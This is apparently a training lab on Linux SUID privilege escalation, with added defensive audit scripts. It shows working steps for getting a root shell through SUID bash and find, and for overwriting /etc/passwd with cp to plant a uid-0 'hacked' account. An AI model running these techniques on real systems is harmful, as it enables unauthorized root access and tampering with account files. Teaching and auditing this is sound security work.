Introduction
In this lab, you will learn about the SUID (Set user ID upon execution) permission and how to leverage it for privilege escalation on Linux systems. The goal is to gain root access by exploiting SUID binaries with various techniques, including using bash, find, cp, and mv commands.
Understanding SUID
In this step, you will understand the concept of SUID permission and its implications.
Typically, when a program is executed on Linux, it runs with the permissions of the current user. However, some programs, like cp, require elevated privileges to perform certain operations, such as copying files to restricted directories. To allow regular users to execute such programs with elevated privileges, the SUID permission can be set on the executable file.
SUID stands for "Set user ID upon execution." When a file has the SUID permission set, it executes with the permissions of its owner, regardless of which user runs it. For example, in this lab the cp command is owned by the root user and has the SUID bit set, allowing any user to execute it with root privileges.
To check the SUID permission on the cp command and save the output to a file, run the following command:
ls -l /usr/bin/cp > /home/labex/project/suid_cp.txt
View the contents of the suid_cp.txt file using the following command:
cat /home/labex/project/suid_cp.txt
Expected output:
-rwsr-xr-x 1 root root 141832 Feb 8 2024 /usr/bin/cp
You should see an s in the permission bits, indicating the SUID permission.
While SUID can be useful for allowing regular users to run specific privileged commands, it can also be exploited if the SUID binary provides functionality for executing system commands or modifying files.
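To make the permission string concrete, here is an added helper (not part of the lab) that converts the symbolic mode field printed by ls -l into the four-digit octal mode that chmod and find -perm use, so the s on /usr/bin/cp above shows up as the 4000 bit. The mode strings fed to it below are constructed samples; the function names are my own.

```shell
# Added helper (not from the lab): turn the symbolic mode field that ls -l
# prints (e.g. "-rwsr-xr-x") into the four-digit octal mode that chmod and
# find -perm use, so the "s" in the owner-execute slot shows up as 4000.

# triad TRIAD SPECIAL: map one rwx group to its digit; print "digit special"
# where special is SPECIAL (4, 2 or 1) if the execute slot held s/S/t/T.
triad() {
    v=0; sp=0
    case $1 in r??) v=$((v + 4)) ;; esac
    case $1 in ?w?) v=$((v + 2)) ;; esac
    case $1 in
        ??x) v=$((v + 1)) ;;
        ??s | ??t) v=$((v + 1)); sp=$2 ;;   # lower case: special bit AND execute
        ??S | ??T) sp=$2 ;;                 # upper case: special bit, no execute
    esac
    printf '%d %d\n' "$v" "$sp"
}

# sym_to_octal MODESTRING: print e.g. 4755 for "-rwsr-xr-x"; fail on junk.
sym_to_octal() {
    p=${1#?}          # drop the file-type character ("-", "d", "l", ...)
    p=${p%[.+]}       # drop a trailing "." or "+" (SELinux / ACL marker)
    case $p in
        [rwx-][rwx-][rwxsS-][rwx-][rwx-][rwxsS-][rwx-][rwx-][rwxtT-]) ;;
        *) printf 'unrecognized mode string: %s\n' "$1" >&2; return 1 ;;
    esac
    o=$(triad "$(printf '%s' "$p" | cut -c1-3)" 4)   # owner: setuid = 4000
    g=$(triad "$(printf '%s' "$p" | cut -c4-6)" 2)   # group: setgid = 2000
    w=$(triad "$(printf '%s' "$p" | cut -c7-9)" 1)   # other: sticky = 1000
    printf '%d%d%d%d\n' "$(( ${o#* } + ${g#* } + ${w#* } ))" "${o% *}" "${g% *}" "${w% *}"
}

# is_suid MODESTRING: succeed when the setuid bit is set (what -perm -4000 tests).
is_suid() {
    mode=$(sym_to_octal "$1") || return 2
    case $mode in 4???|5???|6???|7???) return 0 ;; *) return 1 ;; esac
}

# Demo on the mode string the lab shows for /usr/bin/cp.
sym_to_octal '-rwsr-xr-x'      # prints 4755
is_suid '-rwxr-xr-x' || echo "-rwxr-xr-x: no setuid bit"
```

A capital S in the owner-execute slot means the setuid bit is set on a file that is not executable, which is harmless but usually a sign of a botched chmod; the helper reports it as 4xxx so an audit still sees it.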
Exploiting SUID with bash
In this step, you will learn how to exploit the bash command with SUID permission for privilege escalation.
First, open a terminal and navigate to the /home/labex/project directory:
cd /home/labex/project
Check the permissions of the bash command:
ls -l /bin/bash
Expected output:
-rwsr-xr-x 1 root root 1037520 Feb 5 2022 /bin/bash
If the bash command has the SUID bit set, you can leverage it to execute system commands with root privileges using the following command:
bash -p
Using whoami, verify that you now have a root shell:
whoami
Expected output:
root
Now create a file named root.txt in the /root directory and verify that it was created:
touch /root/root.txt
You should see the root.txt file in the /root directory.
Exploiting SUID with find
In this step, you will learn how to exploit the find command with SUID permission for privilege escalation.
At the end of the previous step you had a root shell. Before starting this step, drop back to the labex user, either by running exit in the root shell or by opening a new terminal.
First, navigate to the /home/labex/project directory:
cd /home/labex/project
Check the permissions of the find command:
ls -l /usr/bin/find
If the find command has the SUID bit set, you can leverage it to execute system commands with root privileges. The syntax for executing a command with find is:
find <file> -exec <command> \;
Here, <file> can be any file. Let's create a file called test:
touch test
Now you can execute commands using find:
find test -exec whoami \;
This executes the whoami command with root privileges. However, this method is not convenient for interactive commands like ssh or su. To get a more convenient root shell, execute /bin/bash through find:
find test -exec /bin/bash -p \;
Note: the -p flag is necessary to preserve the effective user ID (EUID); without it, bash resets the EUID to the real user ID (RUID) when the two differ.
You should now have a root shell. Create a file named root.txt in the /root directory and verify that it was created:
touch /root/root.txt
You should see the root.txt file in the /root directory.
Exploiting SUID with cp and mv
In this step, you will learn how to exploit the cp and mv commands with SUID permission for privilege escalation by modifying the /etc/passwd or /etc/shadow file.
At the end of the previous step you had a root shell. Before starting this step, drop back to the labex user, either by running exit in the root shell or by opening a new terminal.
First, navigate to the /home/labex/project directory:
cd /home/labex/project
Check the permissions of the cp command:
ls -l /bin/cp
If the cp command has the SUID bit set, you can proceed with the exploitation. Copy the contents of /etc/passwd to a file in your home directory:
cat /etc/passwd > /home/labex/project/passwd
Create a new user entry with the following details:
Username: hacked
Password: pass123
Insert the following line at the end of the /home/labex/project/passwd file:
echo 'hacked:$1$ignite$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash' >> /home/labex/project/passwd
Now use the cp command with SUID permission to overwrite the /etc/passwd file:
cp /home/labex/project/passwd /etc/passwd
After overwriting the file, you can switch to the hacked user with the password pass123 using the su command:
su hacked
Since the hacked user has a user ID (uid) of 0, you will have root privileges.
The exploitation method for the mv command is similar to cp. You can try it yourself.
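The two traces this technique leaves in /etc/passwd are exactly what a defender should audit for: a second account with uid 0, and a password hash sitting in the second field instead of the x that defers to /etc/shadow. The check below is an added example, not part of the lab; the sample passwd file it builds is constructed, the hash in it is a placeholder, and the function names are my own.

```shell
# Added example (not from the lab): audit a passwd-format file for the two
# traces the cp/mv technique leaves behind. Prints one finding per line and
# returns 1 when anything was found, 0 when the file looks clean.
audit_passwd() {
    findings=0
    while IFS=: read -r name pw uid gid gecos home shell; do
        case $name in '' | \#*) continue ;; esac     # skip blanks and comments
        # 1. any account other than root with uid 0 is root under another name
        if [ "$uid" = 0 ] && [ "$name" != root ]; then
            printf 'uid0 account: %s (home %s, shell %s)\n' "$name" "$home" "$shell"
            findings=$((findings + 1))
        fi
        # 2. the password field should defer to /etc/shadow ("x") or be locked;
        #    a hash here is readable by every user, and an empty field means
        #    no password at all
        case $pw in
            x | '*' | '!' | '!!') ;;
            *) printf 'unshadowed password field: %s\n' "$name"; findings=$((findings + 1)) ;;
        esac
    done < "$1"
    [ "$findings" -eq 0 ]
}

# Constructed sample: a small passwd with the kind of entry the lab appends.
# The hash field is a placeholder, not a real hash.
make_sample_passwd() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
labex:x:1000:1000:labex:/home/labex:/bin/bash
hacked:$1$PLACEHOLDER$notarealhash:0:0:root:/root:/bin/bash
EOF
    printf '%s\n' "$f"
}

sample=$(make_sample_passwd)
audit_passwd "$sample" || echo "review needed"
```

Run it as audit_passwd /etc/passwd on a real host; because the file is world-readable, the check needs no privileges, and a file-integrity monitor watching /etc/passwd and /etc/shadow catches the overwrite itself.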
Finding SUID Binaries
In this step, you will learn how to find SUID binaries on a system that can potentially be exploited for privilege escalation.
You can use the following commands to list all executable files with the SUID bit set:
find / -user root -perm -4000 -print 2> /dev/null
find / -perm -u=s -type f 2> /dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
Navigate to the /home/labex/project directory to perform the following steps:
cd /home/labex/project
Choose any of the commands to list the SUID binaries on the system and analyze the output:
find / -user root -perm -4000 -print 2> /dev/null > check_results.txt
Check the contents of the check_results.txt file to view the list of SUID binaries on the system:
cat check_results.txt
However, the output may contain many files that cannot be exploited for privilege escalation, so the list requires manual analysis.
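Because the raw list contains many legitimate SUID programs (passwd, su, sudo, mount and the like), the practical way to review it is to diff it against a baseline taken from a freshly installed system with the same find command, and to flag any newcomer whose name is one this lab showed being abused (bash, find, cp, mv). This audit script is an added example, not part of the lab; the baseline and scan files it creates are constructed samples, and the risky-name list is an assumption you should extend for your own environment.

```shell
# Added example (not from the lab): compare a SUID scan against a baseline
# and flag newcomers whose name the lab showed being abused when SUID.
# Both inputs are plain path lists, one per line, as produced by
#   find / -user root -perm -4000 -print 2> /dev/null
RISKY_SUID_NAMES="bash find cp mv"   # assumption: extend for your environment

# new_suid BASELINE CURRENT: print paths in CURRENT that are not in BASELINE.
new_suid() {
    b=$(mktemp); c=$(mktemp)
    sort -u "$1" > "$b"
    sort -u "$2" > "$c"
    comm -13 "$b" "$c"        # lines unique to the second (current) file
    rm -f "$b" "$c"
}

# flag_risky: read paths on stdin, print "RISKY path" for each risky basename.
flag_risky() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        base=${path##*/}
        for n in $RISKY_SUID_NAMES; do
            if [ "$base" = "$n" ]; then printf 'RISKY %s\n' "$path"; fi
        done
    done
}

# audit_suid BASELINE CURRENT: print a NEW line for every addition and a RISKY
# line for the dangerous ones; return 1 when anything risky turned up.
audit_suid() {
    added=$(new_suid "$1" "$2")
    if [ -z "$added" ]; then
        echo "no SUID binaries beyond the baseline"
        return 0
    fi
    printf '%s\n' "$added" | sed 's/^/NEW /'
    risky=$(printf '%s\n' "$added" | flag_risky)
    if [ -n "$risky" ]; then
        printf '%s\n' "$risky"
        return 1
    fi
    return 0
}

# Constructed sample data: a baseline from a clean image and a scan in which
# /bin/bash and /usr/bin/find are newly SUID, as in this lab's VM.
make_sample_scan() {
    base=$(mktemp); cur=$(mktemp)
    printf '/usr/bin/passwd\n/usr/bin/su\n/usr/bin/sudo\n' > "$base"
    printf '/usr/bin/su\n/usr/bin/passwd\n/bin/bash\n/usr/bin/find\n/usr/bin/sudo\n/usr/bin/newgrp\n' > "$cur"
    printf '%s %s\n' "$base" "$cur"
}

set -- $(make_sample_scan)
audit_suid "$1" "$2" || echo "review the RISKY entries above"
```

Additions that are not on the risky list (newgrp in the sample) still print as NEW so they get a human look; the exit status only turns red for names with a known shell-escape path, which makes the script usable as a cron or CI check against a stored baseline.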
Summary
In this lab, you learned about the SUID permission and how to leverage various SUID binaries, such as bash, find, cp, and mv, for privilege escalation on Linux systems. You gained hands-on experience in exploiting these binaries to obtain root access, which is a crucial skill in the field of cybersecurity. The lab provided a practical scenario and guided you through the steps to understand and apply the techniques effectively.